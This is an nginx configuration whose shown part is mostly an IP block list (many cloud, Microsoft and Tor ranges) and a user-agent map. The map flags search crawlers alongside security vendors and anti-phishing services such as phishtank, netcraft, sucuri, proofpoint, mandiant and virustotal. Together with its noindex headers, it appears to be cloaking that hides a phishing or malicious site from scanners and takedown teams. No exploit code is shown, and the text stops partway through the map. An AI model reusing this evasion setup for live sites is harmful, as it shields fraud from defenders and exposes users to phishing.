events {
  worker_connections 20000;
}

http {
  error_log /etc/nginx/log/error.log warn;
  access_log /etc/nginx/log/access.log;
  client_max_body_size 20m;

  add_header Strict-Transport-Security "max-age=15768000";
  add_header Cache-Control "no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0";
  add_header X-Content-Type-Options "nosniff";
  add_header X-Robots-Tag "noindex, nofollow, nosnippet, noarchive";

  resolver 127.0.0.11 valid=10s;
  
  proxy_cache_path /etc/nginx/cache keys_zone=one:500m max_size=1000m;

  set_real_ip_from  10.0.0.0/8;
  set_real_ip_from  172.16.0.0/12;
  set_real_ip_from  192.168.0.0/16;
  real_ip_header    X-Real-IP;

  geo $allow_azure { 
    147.243.0.0/16 0;
    default 1;
  }

  map $http_user_agent $old_chrome {
    default 0;
    "~Chrome\/([0-9][0-9]?|1[0-1][0-4])\." 1;
  }

  map $http_user_agent $old_safari {
    default 0;
    "~Safari\/([1-4][0-9]{1,2}|[1-9][0-9]?|520)\." 1;  # Match Safari versions less than 500
  }

geo $block_ip {
    default 0;
    12.0.0.0/8 1;
    13.0.0.0/8 1;
    20.0.0.0/11 1;
    20.33.0.0/16 1;
    20.34.0.0/15 1;
    20.36.0.0/14 1;
    20.40.0.0/13 1;
    20.48.0.0/12 1;
    20.64.0.0/10 1;
    20.135.0.0/16 1;
    20.136.0.0/15 1;
    20.140.0.0/15 1;
    20.143.0.0/16 1;
    20.150.0.0/15 1;
    20.152.0.0/16 1;
    20.153.0.0/16 1;
    20.157.0.0/16 1;
    20.158.0.0/15 1;
    20.160.0.0/12 1;
    20.184.0.0/13 1;
    20.192.0.0/10 1;
    23.96.0.0/13 1;
    40.64.0.0/12 1;
    40.80.0.0/12 1;
    40.96.0.0/13 1;
    40.104.0.0/14 1;
    40.112.0.0/13 1;
    40.120.0.0/14 1;
    40.124.0.0/16 1;
    40.125.0.0/17 1;
    40.126.0.0/16 1;
    40.127.0.0/16 1;
    40.162.0.0/16 1;
    40.169.0.0/16 1;
    40.170.0.0/16 1;
    40.171.0.0/16 1;
    52.96.0.0/12 1;
    52.112.0.0/14 1;
    52.120.0.0/14 1;
    52.125.0.0/16 1;
    52.126.0.0/15 1;
    52.136.0.0/13 1;
    52.148.0.0/14 1;
    52.152.0.0/13 1;
    52.160.0.0/11 1;
    52.224.0.0/11 1;
    57.144.0.0/12 1;
    62.10.0.0/15 1;
    64.4.0.0/18 1;
    65.52.0.0/14 1;
    68.152.0.0/14 1;
    70.37.0.0/17 1;
    70.37.128.0/18 1;
    70.152.0.0/15 1;
    70.156.0.0/15 1;
    98.64.0.0/14 1;
    98.70.0.0/15 1;
    100.20.0.0/14 1;
    100.24.0.0/13 1;
    101.3.121.242/32 1;
    102.37.0.0/16 1;
    102.130.113.9/32 1;
    102.133.0.0/16 1;
    102.165.26.0/24 1;
    103.3.61.114/32 1;
    103.4.0.0/16 1;
    103.7.224.0/24 1;
    103.8.0.0/16 1;
    103.10.197.50/32 1;
    103.13.69.0/24 1;
    103.15.226.28/32 1;
    103.16.16.107/32 1;
    103.27.124.82/32 1;
    103.28.52.93/32 1;
    103.29.70.23/32 1;
    103.35.74.75/32 1;
    103.35.74.77/32 1;
    103.56.207.84/32 1;
    103.60.32.0/24 1;
    103.83.199.0/24 1;
    103.96.20.0/22 1;
    103.114.191.0/24 1;
    103.139.130.0/23 1;
    103.196.37.111/32 1;
    103.214.7.251/32 1;
    103.228.53.155/32 1;
    103.234.220.197/32 1;
    103.234.220.205/32 1;
    103.236.201.57/32 1;
    103.236.201.88/32 1;
    103.236.201.110/32 1;
    103.245.44.0/23 1;
    103.245.46.0/23 1;
    103.246.0.0/16 1;
    103.251.167.10/32 1;
    103.251.167.20/32 1;
    103.251.167.21/32 1;
    103.253.41.98/32 1;
    104.36.8.0/21 1;
    104.40.0.0/13 1;
    104.77.153.0/24 1;
    104.78.78.0/24 1;
    104.94.200.0/24 1;
    104.94.204.0/23 1;
    104.94.240.0/20 1;
    104.95.0.0/20 1;
    104.129.192.0/20 1;
    104.131.157.171/32 1;
    104.132.0.72/32 1;
    104.144.78.0/24 1;
    104.144.150.0/23 1;
    104.145.0.0/20 1;
    104.146.128.0/17 1;
    104.149.155.226/32 1;
    104.154.0.0/15 1;
    104.192.0.58/32 1;
    104.192.1.138/32 1;
    104.196.0.0/14 1;
    104.200.20.46/32 1;
    104.208.0.0/13 1;
    104.218.63.73/32 1;
    104.218.63.74/32 1;
    104.218.63.75/32 1;
    104.218.63.76/32 1;
    104.219.236.100/32 1;
    104.219.236.119/32 1;
    104.223.123.98/32 1;
    104.224.2.0/24 1;
    104.227.13.0/24 1;
    104.227.23.0/24 1;
    104.227.28.0/23 1;
    104.227.78.0/24 1;
    104.227.82.0/24 1;
    104.227.94.0/24 1;
    104.227.101.0/24 1;
    104.227.133.0/24 1;
    104.227.173.0/24 1;
    104.227.222.0/24 1;
    104.236.0.0/16 1;
    104.237.24.0/24 1;
    104.237.28.0/23 1;
    104.237.30.0/23 1;
    104.237.160.0/19 1;
    104.238.0.0/24 1;
    104.238.46.0/24 1;
    104.244.72.0/21 1;
    104.244.79.187/32 1;
    104.249.32.0/24 1;
    104.251.96.0/20 1;
    104.255.56.11/32 1;
    104.255.56.12/32 1;
    104.255.59.81/32 1;
    104.255.59.82/32 1;
    104.255.59.83/32 1;
    104.255.59.85/32 1;
    104.255.59.86/32 1;
    104.255.59.87/32 1;
    104.255.59.88/32 1;
    104.255.59.91/32 1;
    104.255.59.101/32 1;
    104.255.59.102/32 1;
    104.255.59.103/32 1;
    104.255.59.104/32 1;
    104.255.59.105/32 1;
    104.255.59.106/32 1;
    104.255.59.114/32 1;
    104.255.59.115/32 1;
    104.255.59.118/32 1;
    104.255.59.119/32 1;
    104.255.59.122/32 1;
    104.255.59.123/32 1;
    104.255.59.124/32 1;
    104.255.59.125/32 1;
    104.255.59.126/32 1;
    104.255.59.127/32 1;
    104.255.59.130/32 1;
    104.255.59.131/32 1;
    104.255.59.132/32 1;
    104.255.59.133/32 1;
    104.255.59.134/32 1;
    104.255.59.135/32 1;
    104.255.59.136/32 1;
    104.255.59.137/32 1;
    104.255.59.138/32 1;
    104.255.59.139/32 1;
    105.107.0.0/16 1;
    106.187.37.101/32 1;
    107.20.0.0/14 1;
    107.150.64.0/19 1;
    107.152.217.4/32 1;
    107.167.160.0/19 1;
    107.170.0.0/16 1;
    107.174.138.172/32 1;
    107.174.244.102/32 1;
    107.176.0.0/15 1;
    107.178.192.0/18 1;
    107.181.69.0/24 1;
    107.181.174.84/32 1;
    107.189.1.160/32 1;
    107.189.1.175/32 1;
    107.189.2.91/32 1;
    107.189.2.111/32 1;
    107.189.2.222/32 1;
    107.189.5.68/32 1;
    107.189.5.97/32 1;
    107.189.6.214/32 1;
    107.189.7.88/32 1;
    107.189.7.156/32 1;
    107.189.8.16/32 1;
    107.189.8.65/32 1;
    107.189.8.136/32 1;
    107.189.8.181/32 1;
    107.189.10.63/32 1;
    107.189.10.143/32 1;
    107.189.10.150/32 1;
    107.189.10.154/32 1;
    107.189.11.80/32 1;
    107.189.11.207/32 1;
    107.189.11.228/32 1;
    107.189.12.7/32 1;
    107.189.12.88/32 1;
    107.189.12.148/32 1;
    107.189.12.238/32 1;
    107.189.13.77/32 1;
    107.189.13.91/32 1;
    107.189.13.251/32 1;
    107.189.13.253/32 1;
    107.189.14.43/32 1;
    107.189.14.106/32 1;
    107.189.14.123/32 1;
    107.189.14.182/32 1;
    107.189.28.121/32 1;
    107.189.28.157/32 1;
    107.189.28.241/32 1;
    107.189.29.103/32 1;
    107.189.29.207/32 1;
    107.189.30.22/32 1;
    107.189.30.58/32 1;
    107.189.30.75/32 1;
    107.189.30.86/32 1;
    107.189.30.115/32 1;
    107.189.30.230/32 1;
    107.189.31.102/32 1;
    107.189.31.134/32 1;
    107.189.31.181/32 1;
    107.189.31.227/32 1;
    108.59.80.0/20 1;
    108.128.0.0/13 1;
    108.136.0.0/14 1;
    108.140.0.0/14 1;
    108.156.0.0/14 1;
    108.161.147.0/24 1;
    108.166.224.0/19 1;
    108.169.212.0/24 1;
    108.170.192.0/18 1;
    108.171.128.0/24 1;
    108.175.48.0/22 1;
    108.177.0.0/17 1;
    109.69.67.17/32 1;
    109.70.100.19/32 1;
    109.70.100.20/32 1;
    109.70.100.21/32 1;
    109.70.100.22/32 1;
    109.70.100.23/32 1;
    109.70.100.24/32 1;
    109.70.100.25/32 1;
    109.70.100.26/32 1;
    109.70.100.27/32 1;
    109.70.100.28/32 1;
    109.70.100.29/32 1;
    109.70.100.30/32 1;
    109.70.100.31/32 1;
    109.70.100.32/32 1;
    109.70.100.33/32 1;
    109.70.100.34/32 1;
    109.70.100.35/32 1;
    109.70.100.36/32 1;
    109.70.100.80/32 1;
    109.70.100.81/32 1;
    109.70.100.82/32 1;
    109.70.100.83/32 1;
    109.70.100.84/32 1;
    109.70.100.85/32 1;
    109.70.100.86/32 1;
    109.70.100.87/32 1;
    109.70.100.88/32 1;
    109.70.100.89/32 1;
    109.70.100.90/32 1;
    109.70.100.91/32 1;
    109.70.100.92/32 1;
    109.70.100.93/32 1;
    109.70.100.94/32 1;
    109.126.9.228/32 1;
    109.169.33.163/32 1;
    109.186.0.0/16 1;
    109.190.182.44/32 1;
    109.201.133.100/32 1;
    109.228.40.29/32 1;
    111.221.0.0/16 1;
    111.223.8.0/24 1;
    111.248.62.31/32 1;
    115.70.208.19/32 1;
    115.164.86.121/32 1;
    116.50.56.0/21 1;
    116.129.226.0/24 1;
    117.53.155.129/32 1;
    118.99.13.124/32 1;
    118.163.74.160/32 1;
    118.193.97.0/24 1;
    119.147.182.0/24 1;
    119.161.100.138/32 1;
    120.29.217.46/32 1;
    120.52.12.0/24 1;
    120.52.22.0/24 1;
    120.52.39.0/24 1;
    120.52.153.0/24 1;
    120.232.236.0/24 1;
    120.253.240.0/24 1;
    120.253.241.0/24 1;
    120.253.245.0/24 1;
    122.248.0.0/16 1;
    123.30.128.138/32 1;
    124.47.131.0/24 1;
    124.47.150.0/24 1;
    124.47.189.0/24 1;
    124.109.1.207/32 1;
    125.212.241.131/32 1;
    125.212.241.182/32 1;
    126.72.58.19/32 1;
    128.31.0.0/16 1;
    128.52.128.105/32 1;
    128.94.0.0/16 1;
    128.107.0.0/16 1;
    128.177.0.0/16 1;
    128.199.47.160/32 1;
    128.199.76.145/32 1;
    128.242.0.0/16 1;
    129.35.19.0/24 1;
    129.80.0.0/16 1;
    129.146.0.0/16 1;
    129.148.64.0/18 1;
    129.148.128.0/18 1;
    129.148.200.0/21 1;
    129.149.0.0/16 1;
    129.150.32.0/19 1;
    129.151.0.0/18 1;
    129.151.64.0/19 1;
    129.151.96.0/19 1;
    129.151.128.0/19 1;
    129.151.160.0/19 1;
    129.151.192.0/19 1;
    129.151.224.0/19 1;
    129.152.0.0/19 1;
    129.153.0.0/18 1;
    129.153.64.0/18 1;
    129.153.128.0/18 1;
    129.153.192.0/19 1;
    129.153.224.0/20 1;
    129.153.240.0/23 1;
    129.154.32.0/19 1;
    129.154.192.0/19 1;
    129.154.224.0/19 1;
    129.158.32.0/19 1;
    129.158.192.0/18 1;
    129.159.0.0/18 1;
    129.159.64.0/18 1;
    129.159.128.0/19 1;
    129.159.160.0/19 1;
    129.159.192.0/19 1;
    129.159.224.0/20 1;
    129.159.240.0/20 1;
    129.192.170.0/24 1;
    129.192.171.0/24 1;
    129.192.189.0/24 1;
    129.213.0.0/16 1;
    130.61.0.0/16 1;
    130.115.252.0/22 1;
    130.119.1.0/24 1;
    130.119.2.0/24 1;
    130.149.80.199/32 1;
    130.162.32.0/19 1;
    130.162.128.0/19 1;
    130.162.160.0/19 1;
    130.162.192.0/21 1;
    130.162.208.0/20 1;
    130.162.224.0/19 1;
    130.176.0.0/16 1;
    130.193.10.21/32 1;
    130.193.15.186/32 1;
    130.204.161.3/32 1;
    130.211.0.0/16 1;
    130.253.0.0/16 1;
    131.186.16.0/20 1;
    131.186.32.0/20 1;
    131.186.56.0/21 1;
    131.212.0.0/16 1;
    131.253.0.0/16 1;
    131.255.4.96/32 1;
    132.145.0.0/16 1;
    132.164.0.0/16 1;
    132.226.0.0/18 1;
    132.226.64.0/18 1;
    132.226.128.0/21 1;
    132.226.144.0/20 1;
    132.226.160.0/21 1;
    132.226.168.0/21 1;
    132.226.176.0/21 1;
    132.226.184.0/21 1;
    132.226.192.0/20 1;
    132.226.208.0/21 1;
    132.226.216.0/21 1;
    132.226.224.0/20 1;
    132.226.240.0/20 1;
    132.245.0.0/16 1;
    134.170.0.0/16 1;
    137.116.0.0/16 1;
    137.117.0.0/16 1;
    137.135.0.0/16 1;
    138.91.0.0/16 1;
    138.105.0.0/16 1;
    148.7.0.0/16 1;
    150.171.0.0/16 1;
    155.62.0.0/16 1;
    157.55.0.0/16 1;
    157.56.0.0/16 1;
    157.95.0.0/16 1;
    158.23.0.0/16 1;
    158.158.0.0/16 1;
    159.128.0.0/16 1;
    167.105.0.0/16 1;
    167.162.0.0/16 1;
    167.186.0.0/16 1;
    168.61.0.0/16 1;
    168.62.0.0/15 1;
    169.138.0.0/16 1;
    172.128.0.0/11 1;
    172.160.0.0/11 1;
    172.200.0.0/13 1;
    172.208.0.0/13 1;
    191.232.0.0/13 1;
    2001:489a:2000::/35 1;
    2001:489a:4000::/35 1;
    2404:f800::/32 1;
    2404:f801:8020::/48 1;
    2404:f801:802c::/48 1;
    2407:30c0:184::/48 1;
    2407:30c0:185::/48 1;
    2602:fdeb:50::/48 1;
    2602:fdeb:52::/48 1;
    2602:fdeb:53::/48 1;
    2602:fdeb:54::/48 1;
    2602:fdeb:55::/48 1;
    2602:fdeb:61::/48 1;
    2602:fdeb:62::/48 1;
    2602:fdeb:63::/48 1;
    2602:fdeb:64::/48 1;
    2603:1000::/25 1;
    2603:1061:6::/48 1;
    2603:1062:4::/48 1;
    2603:1062:7::/48 1;
    2603:1063:300::/40 1;
    2603:1063:2100::/40 1;
    2603:1063:7c00::/38 1;
    2606:e540:c00::/48 1;
    2606:e540:c01::/48 1;
    2606:e540:c02::/48 1;
    2606:e540:c03::/48 1;
    2606:e540:c04::/48 1;
}

  map $http_user_agent $is_bot {
    default 0;
    "~*curl*" 1;
    "~*arcticwolf*" 1;
    "~*avanan*" 1;
    "~*Python-urllib*" 1;
    "~*Wget*" 1;
    "~*Lynx*" 1;
    "~*Slackbot-LinkExpanding*" 1;
    "~*cloudfront*" 1;
    "~*ython*" 1;
    "~*YandexBot*" 1;
    "~*imbostratus*" 1;
    "~*MJ12bot*" 1;
    "~*zgrab*" 1;
    "~*Go-http*" 1;
    "~*[bB]anner*" 1;
    "~*gdnplus*" 1;
    "~*s~virustotalcloud*" 1;
    "~*python-requests*" 1;
    "~*Googlebot*" 1;
    "~*bingbot*" 1;
    "~*duckduckbot*" 1;
    "~*Baiduspider*" 1;
    "~*abot*" 1;
    "~*dbot*" 1;
    "~*ebot*" 1;
    "~*hbot*" 1;
    "~*kbot*" 1;
    "~*lbot*" 1;
    "~*mbot*" 1;
    "~*nbot*" 1;
    "~*obot*" 1;
    "~*pbot*" 1;
    "~*rbot*" 1;
    "~*sbot*" 1;
    "~*tbot*" 1;
    "~*vbot*" 1;
    "~*ybot*" 1;
    "~*zbot*" 1;
    "~*bot\\.*" 1;
    "~*bot/*" 1;
    "~*_bot*" 1;
    "~*\\.bot*" 1;
    "~*/bot*" 1;
    "~*-bot*" 1;
    "~*:bot*" 1;
    "~*\\(bot*" 1;
    "~*crawl*" 1;
    "~*slurp*" 1;
    "~*spider*" 1;
    "~*seek*" 1;
    "~*semrush*" 1;
    "~*accoona*" 1;
    "~*acoon*" 1;
    "~*adressendeutschland*" 1;
    "~*ah-ha*" 1;
    "~*ahoy*" 1;
    "~*altavista*" 1;
    "~*ananzi*" 1;
    "~*anthill*" 1;
    "~*appie*" 1;
    "~*arachni*" 1;
    "~*arachnophilia*" 1;
    "~*arale*" 1;
    "~*araneo*" 1;
    "~*aranha*" 1;
    "~*architext*" 1;
    "~*aretha*" 1;
    "~*arks*" 1;
    "~*applebot*" 1;
    "~*asterias*" 1;
    "~*atlocal*" 1;
    "~*atn*" 1;
    "~*atomz*" 1;
    "~*augurfind*" 1;
    "~*backrub*" 1;
    "~*bannana_bot*" 1;
    "~*baypup*" 1;
    "~*bdfetch*" 1;
    "~*big brother*" 1;
    "~*biglotron*" 1;
    "~*bjaaland*" 1;
    "~*blackwidow*" 1;
    "~*blaiz*" 1;
    "~*blog*" 1;
    "~*blo\\.*" 1;
    "~*bloodhound*" 1;
    "~*boitho*" 1;
    "~*booch*" 1;
    "~*bradley*" 1;
    "~*broadcom*" 1;
    "~*butterfly*" 1;
    "~*calif*" 1;
    "~*cassandra*" 1;
    "~*censys*" 1;
    "~*ccubee*" 1;
    "~*cfetch*" 1;
    "~*charlotte*" 1;
    "~*churl*" 1;
    "~*cienciaficcion*" 1;
    "~*cmc*" 1;
    "~*collective*" 1;
    "~*comagent*" 1;
    "~*combine*" 1;
    "~*computingsite*" 1;
    "~*csci*" 1;
    "~*curl*" 1;
    "~*cusco*" 1;
    "~*cisco*" 1;
    "~*daumoa*" 1;
    "~*deepindex*" 1;
    "~*delorie*" 1;
    "~*depspid*" 1;
    "~*detect*" 1;
    "~*deweb*" 1;
    "~*die blinde kuh*" 1;
    "~*digger*" 1;
    "~*ditto*" 1;
    "~*dmoz*" 1;
    "~*docomo*" 1;
    "~*download express*" 1;
    "~*dtaagent*" 1;
    "~*DuoCircle*" 1;
    "~*dwcp*" 1;
    "~*ebiness*" 1;
    "~*ebingbong*" 1;
    "~*e-collector*" 1;
    "~*ejupiter*" 1;
    "~*emacs-w3 search engine*" 1;
    "~*esther*" 1;
    "~*evliya celebi*" 1;
    "~*Exabot*" 1;
    "~*ezresult*" 1;
    "~*facebot*" 1;
    "~*facebook*" 1;
    "~*falcon*" 1;
    "~*felix ide*" 1;
    "~*ferret*" 1;
    "~*fetchrover*" 1;
    "~*fido*" 1;
    "~*filter*" 1;
    "~*findlinks*" 1;
    "~*fireball*" 1;
    "~*fireeye*" 1;
    "~*fish search*" 1;
    "~*fouineur*" 1;
    "~*funnelweb*" 1;
    "~*gazz*" 1;
    "~*gcreep*" 1;
    "~*genieknows*" 1;
    "~*getterroboplus*" 1;
    "~*geturl*" 1;
    "~*globalrelay*" 1;
    "~*glx*" 1;
    "~*goforit*" 1;
    "~*golem*" 1;
    "~*grabber*" 1;
    "~*grapnel*" 1;
    "~*gralon*" 1;
    "~*griffon*" 1;
    "~*gromit*" 1;
    "~*grub*" 1;
    "~*gulliver*" 1;
    "~*hamahakki*" 1;
    "~*harvest*" 1;
    "~*havindex*" 1;
    "~*helix*" 1;
    "~*heritrix*" 1;
    "~*hku www octopus*" 1;
    "~*homerweb*" 1;
    "~*htdig*" 1;
    "~*html index*" 1;
    "~*html_analyzer*" 1;
    "~*htmlgobble*" 1;
    "~*hubater*" 1;
    "~*hyper-decontextualizer*" 1;
    "~*ia_archiver*" 1;
    "~*ibm_planetwide*" 1;
    "~*ichiro*" 1;
    "~*iconsurf*" 1;
    "~*iltrovatore*" 1;
    "~*image.kapsi*" 1;
    "~*imagelock*" 1;
    "~*incywincy*" 1;
    "~*indexer*" 1;
    "~*infobee*" 1;
    "~*informant*" 1;
    "~*ingrid*" 1;
    "~*inktomisearch*" 1;
    "~*inspectorweb*" 1;
    "~*intelliagent*" 1;
    "~*internetshinchakubin*" 1;
    "~*ip3000*" 1;
    "~*iron33*" 1;
    "~*israeli-search*" 1;
    "~*ivia*" 1;
    "~*jack*" 1;
    "~*jakarta*" 1;
    "~*javabee*" 1;
    "~*jetbot*" 1;
    "~*jumpstation*" 1;
    "~*katipo*" 1;
    "~*kaspersky*" 1;
    "~*kdd-explorer*" 1;
    "~*kilroy*" 1;
    "~*knowledge*" 1;
    "~*kototoi*" 1;
    "~*kretrieve*" 1;
    "~*labelgrabber*" 1;
    "~*lachesis*" 1;
    "~*larbin*" 1;
    "~*legs*" 1;
    "~*libwww*" 1;
    "~*linkalarm*" 1;
    "~*linkvalidator*" 1;
    "~*linkscan*" 1;
    "~*lockon*" 1;
    "~*lwp*" 1;
    "~*lycos*" 1;
    "~*magpie*" 1;
    "~*mandiant*" 1;
    "~*mantraagent*" 1;
    "~*mapoftheinternet*" 1;
    "~*marvin*" 1;
    "~*mattie*" 1;
    "~*mediafox*" 1;
    "~*mediapartners*" 1;
    "~*mercator*" 1;
    "~*merzscope*" 1;
    "~*microsoft url control*" 1;
    "~*mime*" 1;
    "~*minirank*" 1;
    "~*miva*" 1;
    "~*mj12*" 1;
    "~*mnogosearch*" 1;
    "~*moget*" 1;
    "~*monster*" 1;
    "~*moose*" 1;
    "~*motor*" 1;
    "~*multitext*" 1;
    "~*muncher*" 1;
    "~*muscatferret*" 1;
    "~*mwd.search*" 1;
    "~*myweb*" 1;
    "~*najdi*" 1;
    "~*nameprotect*" 1;
    "~*nationaldirectory*" 1;
    "~*nazilla*" 1;
    "~*ncsabeta*" 1;
    "~*nec-meshexplorer*" 1;
    "~*nederland.zoek*" 1;
    "~*netcarta webmap engine*" 1;
    "~*netcraft*" 1;
    "~*netmechanic*" 1;
    "~*netresearchserver*" 1;
    "~*netscoop*" 1;
    "~*newscan-online*" 1;
    "~*nhse*" 1;
    "~*Actimize*" 1;
    "~*nokia6682/*" 1;
    "~*nomad*" 1;
    "~*noyona*" 1;
    "~*nutch*" 1;
    "~*nzexplorer*" 1;
    "~*objectssearch*" 1;
    "~*occam*" 1;
    "~*omni*" 1;
    "~*open text*" 1;
    "~*openfind*" 1;
    "~*openintelligencedata*" 1;
    "~*orb search*" 1;
    "~*osis-project*" 1;
    "~*pack rat*" 1;
    "~*pageboy*" 1;
    "~*pagebull*" 1;
    "~*page_verifier*" 1;
    "~*paloalto*" 1;
    "~*panscient*" 1;
    "~*parasite*" 1;
    "~*partnersite*" 1;
    "~*patric*" 1;
    "~*pear .*" 1;
    "~*pegasus*" 1;
    "~*peregrinator*" 1;
    "~*pgp key agent*" 1;
    "~*phantom*" 1;
    "~*phpdig*" 1;
    "~*picosearch*" 1;
    "~*piltdownman*" 1;
    "~*pimptrain*" 1;
    "~*pinpoint*" 1;
    "~*pioneer*" 1;
    "~*piranha*" 1;
    "~*plumtreewebaccessor*" 1;
    "~*pogodak*" 1;
    "~*poirot*" 1;
    "~*pompos*" 1;
    "~*poppelsdorf*" 1;
    "~*poppi*" 1;
    "~*popular iconoclast*" 1;
    "~*psycheclone*" 1;
    "~*publisher*" 1;
    "~*proofpoint*" 1;
    "~*python*" 1;
    "~*rambler*" 1;
    "~*raven search*" 1;
    "~*roach*" 1;
    "~*road runner*" 1;
    "~*roadhouse*" 1;
    "~*robbie*" 1;
    "~*robofox*" 1;
    "~*robozilla*" 1;
    "~*rules*" 1;
    "~*HeadlessLinux*" 1;
    "~*salty*" 1;
    "~*sbider*" 1;
    "~*scan*" 1;
    "~*scooter*" 1;
    "~*scoutjet*" 1;
    "~*scrubby*" 1;
    "~*scrape*" 1;
    "~*search *" 1;
    "~*searchprocess*" 1;
    "~*semanticdiscovery*" 1;
    "~*senrigan*" 1;
    "~*sg-scout*" 1;
    "~*shai 'hulud*" 1;
    "~*shark*" 1;
    "~*shopwiki*" 1;
    "~*shodan*" 1;
    "~*sidewinder*" 1;
    "~*sift*" 1;
    "~*silk*" 1;
    "~*simmany*" 1;
    "~*site searcher*" 1;
    "~*site valet*" 1;
    "~*sitetech-rover*" 1;
    "~*skymob*" 1;
    "~*sleek*" 1;
    "~*smartwit*" 1;
    "~*sna-.*" 1;
    "~*snappy*" 1;
    "~*snooper*" 1;
    "~*Sogou*" 1;
    "~*sohu*" 1;
    "~*sonicwall*" 1;
    "~*sophos*" 1;
    "~*speedfind*" 1;
    "~*spam*" 1;
    "~*sphere*" 1;
    "~*sphider*" 1;
    "~*spinner*" 1;
    "~*splunk*" 1;
    "~*spyder*" 1;
    "~*steeler/*" 1;
    "~*suke*" 1;
    "~*suntek*" 1;
    "~*supersnooper*" 1;
    "~*surfnomore*" 1;
    "~*sven*" 1;
    "~*sygol*" 1;
    "~*symantec*" 1;
    "~*szukacz*" 1;
    "~*tach black widow*" 1;
    "~*tarantula*" 1;
    "~*templeton*" 1;
    "~*threat*" 1;
    "~*/teoma*" 1;
    "~*t-h-u-n-d-e-r-s-t-o-n-e*" 1;
    "~*theophrastus*" 1;
    "~*titan*" 1;
    "~*titin*" 1;
    "~*tkwww*" 1;
    "~*toutatis*" 1;
    "~*t-rex*" 1;
    "~*tutorgig*" 1;
    "~*twiceler*" 1;
    "~*twisted*" 1;
    "~*ucsd*" 1;
    "~*udmsearch*" 1;
    "~*url check*" 1;
    "~*updated*" 1;
    "~*vagabondo*" 1;
    "~*valkyrie*" 1;
    "~*verticrawl*" 1;
    "~*victoria*" 1;
    "~*virus*" 1;
    "~*vision-search*" 1;
    "~*volcano*" 1;
    "~*voyager/*" 1;
    "~*voyager-hc*" 1;
    "~*w3c_validator*" 1;
    "~*w3m2*" 1;
    "~*w3mir*" 1;
    "~*walker*" 1;
    "~*wallpaper*" 1;
    "~*wanderer*" 1;
    "~*wapiti*" 1;
    "~*wauuu*" 1;
    "~*wavefire*" 1;
    "~*web\ core*" 1;
    "~*web\ hopper*" 1;
    "~*web\ wombat*" 1;
    "~*webbandit*" 1;
    "~*webcatcher*" 1;
    "~*webcopy*" 1;
    "~*webfoot*" 1;
    "~*weblayers*" 1;
    "~*weblinker*" 1;
    "~*weblog monitor*" 1;
    "~*webmirror*" 1;
    "~*webmonkey*" 1;
    "~*webquest*" 1;
    "~*webreaper*" 1;
    "~*websitepulse*" 1;
    "~*websnarf*" 1;
    "~*webstolperer*" 1;
    "~*webvac*" 1;
    "~*webwalk*" 1;
    "~*webwatch*" 1;
    "~*webwombat*" 1;
    "~*webzinger*" 1;
    "~*wget*" 1;
    "~*whizbang*" 1;
    "~*whowhere*" 1;
    "~*wild ferret*" 1;
    "~*worldlight*" 1;
    "~*wwwc*" 1;
    "~*wwwster*" 1;
    "~*xenu*" 1;
    "~*xget*" 1;
    "~*xift*" 1;
    "~*xirq*" 1;
    "~*yandex*" 1;
    "~*yanga*" 1;
    "~*yeti*" 1;
    "~*yodao*" 1;
    "~*zao/*" 1;
    "~*zippp*" 1;
    "~*zoomeye*" 1;
    "~*zyborg*" 1;
    "~*googlebot*" 1;
    "~*BlackWidow*" 1;
    "~*Bot mailto:craftbot@yahoo*" 1;
    "~*ChinaClaw*" 1;
    "~*Custo*" 1;
    "~*DISCo*" 1;
    "~*Download Demon*" 1;
    "~*eCatch*" 1;
    "~*EirGrabber*" 1;
    "~*EmailSiphon*" 1;
    "~*EmailWolf*" 1;
    "~*Express WebPictures*" 1;
    "~*ExtractorPro*" 1;
    "~*EyeNetIE*" 1;
    "~*FlashGet*" 1;
    "~*GetRight*" 1;
    "~*GetWeb!*" 1;
    "~*Go!Zilla*" 1;
    "~*Go-Ahead-Got-It*" 1;
    "~*GrabNet*" 1;
    "~*Grafula*" 1;
    "~*HMView*" 1;
    "~*HTTrack*" 1;
    "~*Image Stripper*" 1;
    "~*Image Sucker*" 1;
    "~*Indy Library*" 1;
    "~*InterGET*" 1;
    "~*Internet Ninja*" 1;
    "~*JetCar*" 1;
    "~*JOC\ Web\ Spider*" 1;
    "~*LeechFTP*" 1;
    "~*Mass Downloader*" 1;
    "~*MIDown tool*" 1;
    "~*Mister PiX*" 1;
    "~*Navroad*" 1;
    "~*NearSite*" 1;
    "~*NetAnts*" 1;
    "~*NetSpider*" 1;
    "~*Net Vampire*" 1;
    "~*NetZIP*" 1;
    "~*Octopus*" 1;
    "~*Offline Explorer*" 1;
    "~*Offline Navigator*" 1;
    "~*PageGrabber*" 1;
    "~*Papa Foto*" 1;
    "~*pavuk*" 1;
    "~*pcBrowser*" 1;
    "~*RealDownload*" 1;
    "~*ReGet*" 1;
    "~*SiteSnagger*" 1;
    "~*SmartDownload*" 1;
    "~*SuperBot*" 1;
    "~*SuperHTTP*" 1;
    "~*Surfbot*" 1;
    "~*tAkeOut*" 1;
    "~*Teleport Pro*" 1;
    "~*trendmicro*" 1;
    "~*trustwave*" 1;
    "~*VoidEYE*" 1;
    "~*Web\ Image\ Collector*" 1;
    "~*Web\ Sucker*" 1;
    "~*WebAuto*" 1;
    "~*WebCopier*" 1;
    "~*WebFetch*" 1;
    "~*WebGo IS*" 1;
    "~*WebLeacher*" 1;
    "~*WebReaper*" 1;
    "~*WebSauger*" 1;
    "~*Website eXtractor*" 1;
    "~*Website Quester*" 1;
    "~*WebStripper*" 1;
    "~*WebWhacker*" 1;
    "~*WebZIP*" 1;
    "~*Wget*" 1;
    "~*Widow*" 1;
    "~*WWWOFFLE*" 1;
    "~*Xaldon WebSpider*" 1;
    "~*Zeus*" 1;
    "~*httpx*" 1;
    "~*l9tcpid*" 1;
    "~*zscaler*" 1;
    "~*Preview*" 1;
    "~*paypal*" 1;
    "~*112.2o7*" 1;
    "~*clean-mx*" 1;
    "~*phishmongers*" 1;
    "~*phishtank*" 1;
    "~*dnblead*" 1;
    "~*static.spro*" 1;
    "~*sucuri*" 1;
    "~*rima-tde*" 1;
    "~*tfbnw*" 1;
    "~*pacbell*" 1;
    "~*tpnet.pl*" 1;
    "~*ovh*" 1;
    "~*above*" 1;
    "~*softlayer*" 1;
    "~*amazonaws*" 1;
    "~*cyveillance*" 1;
    "~*phishtank*" 1;
    "~*dreamhost*" 1;
    "~*netpilot*" 1;
    "~*calyxinstitute*" 1;
    "~*tor-exit*" 1;
    "~*tor-node*" 1;
    "~*msnbot*" 1;
    "~*p3pwgdsn*" 1;
    "~*netcraft*" 1;
    "~*trendmicro*" 1;
    "~*ebay*" 1;
